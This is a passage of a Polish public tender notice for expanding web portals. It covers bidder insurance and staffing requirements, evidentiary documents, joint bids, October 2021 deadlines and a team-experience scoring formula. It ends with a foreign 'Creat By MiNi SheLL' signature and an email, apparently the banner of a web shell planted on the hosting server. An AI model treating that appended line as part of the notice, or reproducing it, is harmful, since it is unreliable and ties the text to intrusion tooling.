zobowiązany jest wykazać, że jest ubezpieczony (posiada polisę lub inny dokument ubezpieczenia) od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 200 000,00 zł. <br/>1.1.4	zdolności technicznej lub zawodowej: <br/>1.1.4.1	Wykonawca spełni warunek zdolności technicznej lub zawodowej, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych nadal wykonuje minimum jedną usługę polegającą na realizacji rozbudowanych projektów IT, w szczególności usługę polegającą na rozbudowie portali i serwisów internetowych za kwotę minimum 200 000,00 zł brutto.<br/>**Przez jedną usługę Zamawiający rozumie usługę wykonaną w ramach jednej umowy lub większej liczby umów świadczonych w tym samym czasie (zamówienia udzielane w częściach) dla jednego Zamawiającego (Usługobiorcy). Wartość świadczonej usługi nie może być mniejsza niż 200 000,00 zł brutto.<br/><br/>1.1.4.2	Wykonawca spełni niniejszy warunek jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia o kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, odpowiadającym warunkom określonym poniżej: <br/><br/><br/><br/><br/><br/>Nazwa pełnionej roli	Kwalifikacje	Minimalna liczba udostępnionych osób<br/>Projekt Manager<br/>	co najmniej 5-letnie doświadczenie zawodowe <br/>	1<br/>UX Designer<br/>	co najmniej 5-letnie doświadczenie zawodowe	1<br/>Programista Front End<br/>	co najmniej 5-letnie doświadczenie zawodowe	1<br/>Programista Back End<br/>	co najmniej 5-letnie doświadczenie zawodowe	1<br/>Graphic Designer<br/>	co najmniej 5-letnie doświadczenie zawodowe	1<br/><br/>Jedna osoba może zostać wykazana przez Wykonawcę tylko w jednej roli. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego w Rozdziale VII ust. 1.1 i .1.2. – sporządzone według wzoru stanowiącego Załącznik nr<br/>5 do SWZ;<br/>5. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej– sporządzone według wzoru stanowiącego Załącznik nr 8 do SWZ;<br/>6. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o których mowa w ust. 3 pkt 1, składa dokument lub dokumenty wystawione w<br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego<br/>likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu<br/>z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed upływem terminu ich złożenia.<br/>7. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 1, lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 zastępuje się je odpowiednio w całości lub w<br/>części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby alboosób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania<br/>nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub<br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>8. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP<br/>dane umożliwiające dostęp do tych środków;<br/>9. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>10. W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (DZ. U z 2020 poz. 2415), oraz rozporządzenia Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (DZ. U. z 2020 poz. 2452).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.1	Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3.2	Dokumenty potwierdzające, że Wykonawca jest ubezpieczony (posiada polisę lub inny dokument ubezpieczenia) od odpowiedzialności cywilnej na kwotę nie niższą niż 200 000,00 zł. <br/>3.3	Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakres wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami potwierdzające spełnienie warunków określonych w rozdziale VI pkt 1 ppkt 1.1.4.2 SWZ – sporządzony według wzoru stanowiącego Załącznik nr 7 do SWZ. <br/>3.4	Wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy usługi zostały wykonane należycie na Załączniku nr 6 do SWZ.<br/>Dowodami, o których wyżej mowa, są:<br/>•	referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane, z tym że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;<br/>•	oświadczenie Wykonawcy — jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać referencji bądź innych dokumentów, o których wyżej mowa.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunków dotyczących zdolności technicznej lub zawodowej dopuszcza łączenie spełnienia warunku udziału przez Wykonawców.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w rozdziale VIII pkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Załącznikiem nr 2 do SWZ - Istotne postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://rdc.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest zrealizować przedmiot zamówienia w terminie minimum 6 miesięcy maksimum 8 miesięcy od daty podpisania umowy.<br/>4.	Ocena punktowa w kryterium „Doświadczenie zespołu” zostanie dokonana dokonana na podstawie dokumentu „Wykaz personelu”, o którym mowa w rozdziale XIV pkt 12 ppkt 12.4 SWZ. <br/><br/>Zamawiający dokona oceny ofert opierając się na następujących zasadach:<br/>Udział każdej z osób w każdym z projektów zostanie zaznaczony w poniższej tabeli (z liczbą kolumn odpowiadającą liczbie projektów, na które powołuje się wykonawca):<br/><br/>Personel<br/>kluczowy<br/>	Zrealizowane projekty<br/>	…………….	…………….	…………….	…………….	…………….<br/>p…… <br/>p……. <br/>p…… <br/>p……. <br/>p…….. <br/><br/>Liczba kratek, w których zaznaczono udział każdej z osób w każdym z projektów stanowić będzie liczbę „małych” punktów. „Małe” punkty zostaną następnie przeliczone na punkty, które zostaną przyznane<br/>ofercie w ramach kryterium „Doświadczenie zespołu” wg wzoru: DZ = okres doświadczenia zespołu rozpatrywanej oferty : najdłuższy okres doświadczenia zespołu rozpatrywanych ofert - określony w ofertach rozpatrywanych x 100 pkt x 30%.

Creat By MiNi SheLL
Email: jattceo@gmail.com